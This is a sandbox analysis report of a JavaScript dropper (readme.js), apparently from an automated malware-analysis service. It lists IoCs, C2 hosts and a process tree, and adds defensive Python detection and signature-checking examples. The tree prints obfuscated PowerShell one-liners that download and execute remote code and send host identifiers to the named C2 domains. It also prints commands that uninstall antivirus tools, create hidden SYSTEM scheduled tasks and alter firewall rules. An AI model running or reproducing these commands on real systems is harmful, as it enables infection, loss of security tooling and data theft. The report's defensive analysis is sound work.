Analysis
max time kernel: 150s
max time network: 152s
platform: windows7_x64
resource: win7v20201028
submitted: 13-01-2021 06:49

Static task: static1
Behavioral task: behavioral1
  Sample: readme.js
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: readme.js
  Resource: win10v20201028
General
Target: readme.js
Size: 10KB
MD5: db49b6f1f379122685be9553c5cc0f37
SHA1: 45788a5c0c0d97d9bed9c0e6115eca1edbad8ba6
SHA256: d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09
SHA512: 1eae9f302d90b3a1887b9f74927bf9bfac0519ae0f4019497177eca3ac2086ed71b4296193bcf62ba493d7fe2e4d57f42ded79ed5e8789abca206a2185ebab23
Malware Config
Extracted: http://t.zz3r0.com
Extracted: http://t.zer9g.com
Extracted: http://t.bb3u9.com
Signatures
Blocklisted process makes network request 8 IoCs
Processes:
flow  pid   process
7     1976  powershell.exe
19    2640  powershell.EXE
23    1900  powershell.EXE
25    1900  powershell.EXE
38    2612  powershell.EXE
40    2612  powershell.EXE
41    2640  powershell.EXE
44    2640  powershell.EXE
Executes dropped EXE 3 IoCs
Processes:
pid   process
3016  0MSJ3Ad6IVD.exe
1536  0MSJ3Ad6IVD.exe
2084  0MSJ3Ad6IVD.exe
Modifies Windows Firewall 1 TTPs
Stops running service(s) 3 TTPs
Loads dropped DLL 7 IoCs
Processes:
pid   process
2012  cmd.exe
2776  taskmgr.exe
2776  taskmgr.exe
2776  taskmgr.exe
2776  taskmgr.exe
2776  taskmgr.exe
2776  taskmgr.exe
Drops file in System32 directory 89 IoCs
Processes:
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid   process
2412  schtasks.exe
2516  schtasks.exe
2764  schtasks.exe
928   schtasks.exe
2084  schtasks.exe
3056  schtasks.exe
2564  schtasks.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
pid   process
2828  NETSTAT.EXE
Modifies data under HKEY_USERS 10 IoCs
Processes (process: description, ioc):
0MSJ3Ad6IVD.exe: Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
powershell.EXE: Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage
powershell.EXE: Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 20e915d078e9d601
powershell.EXE: Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000
powershell.EXE: Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
powershell.EXE: Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"
0MSJ3Ad6IVD.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
powershell.EXE: Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"
powershell.EXE: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
0MSJ3Ad6IVD.exe: Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
pid   process
1980  notepad.exe
Suspicious behavior: EnumeratesProcesses 121 IoCs
Processes:
Suspicious use of AdjustPrivilegeToken 296 IoCs
Processes:
Suspicious use of FindShellTrayWindow 58 IoCs
Processes:
Suspicious use of WriteProcessMemory 924 IoCs
Processes:
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EIDQHRRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\notepad.exenotepad C:\Users\Admin\AppData\Local\Temp\readme.js3⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EIDQHRRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 14⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Eset%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%avast%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%avp%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe  (depth 4)
  "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart

C:\Windows\system32\schtasks.exe  (depth 4)
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
  - Creates scheduled task(s)

C:\Windows\system32\schtasks.exe  (depth 4)
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \RAyou71hSe /F /tr "powershell -w hidden -c PS_CMD"
  - Creates scheduled task(s)

C:\Windows\system32\schtasks.exe  (depth 4)
  "C:\Windows\system32\schtasks.exe" /run /tn \RAyou71hSe

C:\Windows\system32\schtasks.exe  (depth 4)
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn w3zJRG\P7G6p3t /F /tr "powershell -w hidden -c PS_CMD"
  - Creates scheduled task(s)

C:\Windows\system32\schtasks.exe  (depth 4)
  "C:\Windows\system32\schtasks.exe" /run /tn w3zJRG\P7G6p3t

C:\Windows\system32\schtasks.exe  (depth 4)
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\IuKU1vQE\m8lB4QK90L /F /tr "powershell -w hidden -c PS_CMD"
  - Creates scheduled task(s)

C:\Windows\system32\schtasks.exe  (depth 4)
  "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\IuKU1vQE\m8lB4QK90L

C:\Windows\system32\cmd.exe  (depth 4)
  "C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd

C:\Windows\system32\netsh.exe  (depth 5)
  netsh.exe firewall add portopening tcp 65529 SDNSd

C:\Windows\system32\netsh.exe  (depth 4)
  "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53

C:\Windows\system32\netsh.exe  (depth 4)
  "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block

C:\Windows\system32\netsh.exe  (depth 4)
  "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block

C:\Windows\system32\schtasks.exe  (depth 4)
  "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F

C:\Windows\system32\schtasks.exe  (depth 4)
  "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F

C:\Windows\system32\schtasks.exe  (depth 4)
  "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F
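Everything from the Malwarebytes uninstall to the Rtsa task deletions, and most of the rest of this tree, is done with signed Windows binaries (cmd, schtasks, netsh, sc, csc, powershell), so the detectable surface is the command line itself. The Python below is an added example written for this page, not part of the sandbox report: a small rule set run over command lines copied from this tree (two abridged with "...") plus two constructed benign lines. The normalisation step strips the backticks that split identifiers (Ne`w-Obj`ect, I`ex) and re-joins the 'http://'+'t.zz3'+'r0.com' concatenation, which is also how the C2 host is pulled back out of the one-liner. Rule and function names are mine.

```python
import re

# Command lines taken from the process tree on this page (the two marked "..." are
# abridged), plus two constructed benign lines that the rules must not fire on.
SAMPLES = [
    ("uninstall_av", r'"C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart'),
    ("task_hidden_ps", r'"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \RAyou71hSe /F /tr "powershell -w hidden -c PS_CMD"'),
    ("portopening", r'netsh.exe firewall add portopening tcp 65529 SDNSd'),
    ("portproxy", r'"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53'),
    ("block_445", r'"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block'),
    ("downloader", r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u); ... {I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))"""),
    ("sc_delete", r'"C:\Windows\system32\sc.exe" Delete "DNS Server"'),
    ("named_pipe", r"""powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd(); ... I`Ex($cmd)"""),
    ("csc_temp", r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\j5c31vh0\j5c31vh0.cmdline"'),
    ("benign_query", r'"C:\Windows\system32\schtasks.exe" /query /fo LIST'),                  # constructed
    ("benign_ps", r'powershell.exe -NoProfile -Command Get-Process | Sort-Object CPU'),     # constructed
]


def normalize(cmd: str) -> str:
    """Undo the cheap evasions seen above: backticks inside identifiers and
    'a'+'b' string splitting of the C2 host; then lower-case for matching."""
    s = cmd.replace("`", "")
    s = re.sub(r"'\s*\+\s*'", "", s)      # 'http://'+'t.zz3'+'r0.com' -> 'http://t.zz3r0.com'
    return s.lower()


def extract_hosts(cmd: str):
    """C2 hosts as they appear after de-concatenation."""
    return re.findall(r"https?://([a-z0-9.-]+)", normalize(cmd))


# Each rule sees the raw line and the normalised line.
RULES = {
    "ps_backtick_identifier_obfuscation":
        lambda raw, n: re.search(r"[a-z]`[a-z]", raw, re.I) is not None,
    "ps_webclient_download_to_iex":
        lambda raw, n: "webclient" in n and ("downloaddata" in n or "downloadstring" in n)
        and ("iex(" in n or "invoke-expression" in n),
    "ps_host_fingerprint_in_url":      # COMPUTERNAME, USERNAME and SMBIOS UUID sent in the query string
        lambda raw, n: "computersystemproduct" in n and ".uuid" in n and "env:username" in n,
    "ps_named_pipe_to_iex":
        lambda raw, n: "namedpipeserverstream" in n and "iex(" in n,
    "schtasks_create_as_system":
        lambda raw, n: "schtasks" in n and "/create" in n and "/ru system" in n,
    "schtasks_action_hidden_powershell":
        lambda raw, n: re.search(r'/tr\s+"?powershell(\.exe)?\s+-w\s+hidden', n) is not None,
    "netsh_legacy_portopening":
        lambda raw, n: "firewall add portopening" in n,
    "netsh_portproxy_add":             # 65529 -> 1.1.1.1:53, opened in the firewall just before
        lambda raw, n: "portproxy add v4tov4" in n,
    "netsh_block_inbound_445_135":
        lambda raw, n: re.search(r"localport=(445|135)\b.*action=block", n) is not None,
    "sc_delete_service":
        lambda raw, n: re.search(r'\bsc(\.exe)?"?\s+delete\s', n) is not None,
    "security_tool_silent_uninstall":
        lambda raw, n: "unins000.exe" in n and "/verysilent" in n,
    "csc_compile_from_windows_temp":   # Add-Type from a SYSTEM context compiles here
        lambda raw, n: "csc.exe" in n and re.search(r'@"?c:\\windows\\temp\\', n) is not None,
}


def scan(cmd: str):
    """Names of the rules that fire on one command line, in RULES order."""
    n = normalize(cmd)
    return [name for name, test in RULES.items() if test(cmd, n)]


def scan_samples():
    return {label: scan(cmd) for label, cmd in SAMPLES}


if __name__ == "__main__":
    for label, hits in scan_samples().items():
        print(f"{label:15} {hits}")
    print(extract_hosts(dict(SAMPLES)["downloader"]))
```

The rules are deliberately on the normalised text, so a variant that moves the backticks or splits the host differently still fires; the two benign lines show that plain schtasks and PowerShell use does not.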
C:\Windows\system32\msiexec.exe  (depth 1)
  C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\taskeng.exe  (depth 1)
  taskeng.exe {3C8292FC-D1C9-428B-B0D6-C0720615F4A6} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
  - Blocklisted process makes network request
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
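The downloader one-liners above (and the t.bb3u9.com copy further down) all carry the same 1024-bit RSA modulus and exponent 65537, and only hand the fetched bytes to Invoke-Expression after RSACryptoServiceProvider.VerifyData passes with SHA-1. Two consequences for a responder: a sinkholed or takeover domain cannot feed these tasks a payload, and the modulus is a more durable indicator than any of the three hostnames. The Python below is an added example written for this page, not code from the report or from the sample. It reconstructs the response layout from the one-liner (172 base64 characters of signature, one separator byte, then the body) and the PKCS#1 v1.5/SHA-1 check, and exercises it with a throwaway key, because neither the real a.jsp response nor the operator's private key is on this page; the body and key are constructed.

```python
import base64
import hashlib
import random

# Public key hard-coded in the downloader one-liners (1024-bit, e = 65537).
CAMPAIGN_MODULUS_B64 = "2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10="
CAMPAIGN_E = 65537

# Response layout as the one-liner slices it: $d[0..171] is the base64 text of a
# 128-byte signature, byte 172 is a separator it never reads, $d[173..] is the
# body that reaches Invoke-Expression only if the signature verifies.
SIG_B64_LEN = 172
BODY_OFFSET = 173

# PKCS#1 v1.5 DigestInfo for SHA-1; RSACryptoServiceProvider.VerifyData with a
# SHA1CryptoServiceProvider checks exactly this encoding.
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")


def modulus_size(modulus_b64: str) -> int:
    """Key size in bytes (128 for the modulus in the report)."""
    return len(base64.b64decode(modulus_b64))


def _emsa_pkcs1_v15(body: bytes, k: int) -> bytes:
    t = SHA1_DIGESTINFO + hashlib.sha1(body).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def verify_payload(blob: bytes, modulus_b64: str, e: int = CAMPAIGN_E):
    """Split a captured response the way the downloader does and check it.
    Returns (ok, body); the body comes back either way so a capture can be
    read, but only ok=True means the holder of the private key signed it."""
    if len(blob) <= BODY_OFFSET:                     # mirrors: if($c -gt 173)
        return False, b""
    body = blob[BODY_OFFSET:]
    try:
        sig = base64.b64decode(blob[:SIG_B64_LEN], validate=True)
    except ValueError:
        return False, body
    n = int.from_bytes(base64.b64decode(modulus_b64), "big")
    k = modulus_size(modulus_b64)
    s = int.from_bytes(sig, "big")
    if len(sig) != k or s >= n:
        return False, body
    em = pow(s, e, n).to_bytes(k, "big")
    return em == _emsa_pkcs1_v15(body, k), body


# Operator side, rebuilt with a throwaway key so the format can be exercised.
def _is_probable_prime(n: int, rounds: int = 32) -> bool:
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):                          # Miller-Rabin
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int, e: int) -> int:
    while True:
        c = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if (c - 1) % e and _is_probable_prime(c):
            return c


def make_test_key(bits: int = 1024, e: int = CAMPAIGN_E):
    """Fresh RSA key for the demo; the operator's private key is not on this page."""
    while True:
        p, q = _random_prime(bits // 2, e), _random_prime(bits // 2, e)
        if p != q and (p * q).bit_length() == bits:
            break
    n_b64 = base64.b64encode((p * q).to_bytes(bits // 8, "big")).decode()
    return n_b64, pow(e, -1, (p - 1) * (q - 1))


def sign_payload(body: bytes, modulus_b64: str, d: int) -> bytes:
    """Emit a blob in the same layout: 172 base64 chars, one LF, then the body."""
    n = int.from_bytes(base64.b64decode(modulus_b64), "big")
    k = modulus_size(modulus_b64)
    m = int.from_bytes(_emsa_pkcs1_v15(body, k), "big")
    return base64.b64encode(pow(m, d, n).to_bytes(k, "big")) + b"\n" + body


def demo():
    body = b"Write-Host 'constructed sample body'"    # stands in for the a.jsp script
    mod_b64, d = make_test_key()
    blob = sign_payload(body, mod_b64, d)
    ok, parsed = verify_payload(blob, mod_b64)
    tampered = blob[:BODY_OFFSET] + body.replace(b"Write-Host", b"Invoke-Expression")
    ok_tampered, _ = verify_payload(tampered, mod_b64)
    ok_wrong_key, _ = verify_payload(blob, CAMPAIGN_MODULUS_B64)   # not signed by that key
    return ok, parsed == body, ok_tampered, ok_wrong_key
```

demo() returns (True, True, False, False): the blob verifies under the key that signed it, a change to the body fails, and the same blob checked against the campaign modulus fails, which is the situation a defender-served payload would be in. To confirm that a captured a.jsp response belongs to this key, call verify_payload(capture, CAMPAIGN_MODULUS_B64).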
C:\Windows\system32\cmd.exe  (depth 3)
  "C:\Windows\system32\cmd.exe" /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|0MSJ3Ad6IVD.exe -
  - Loads dropped DLL

C:\Windows\system32\cmd.exe  (depth 4)
  C:\Windows\system32\cmd.exe /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"

C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe  (depth 4)
  0MSJ3Ad6IVD.exe -
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (depth 5)
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\j5c31vh0\j5c31vh0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (depth 6)
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES79B2.tmp" "c:\Windows\Temp\j5c31vh0\CSCAA465576E467457C89EA48149380364.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (depth 5)
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\1liziz1t\1liziz1t.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (depth 6)
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES8F06.tmp" "c:\Windows\Temp\1liziz1t\CSC55942279109D4A31AFB3C31D8BAF4A54.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 5)
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (depth 5)
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\4grphwgc\4grphwgc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (depth 6)
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES4470.tmp" "c:\Windows\Temp\4grphwgc\CSCD9F71D3E49E4B70B656791AE788C78.TMP"
C:\Windows\system32\cmd.exe  (depth 3)
  "C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|0MSJ3Ad6IVD.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe

C:\Windows\system32\cmd.exe  (depth 4)
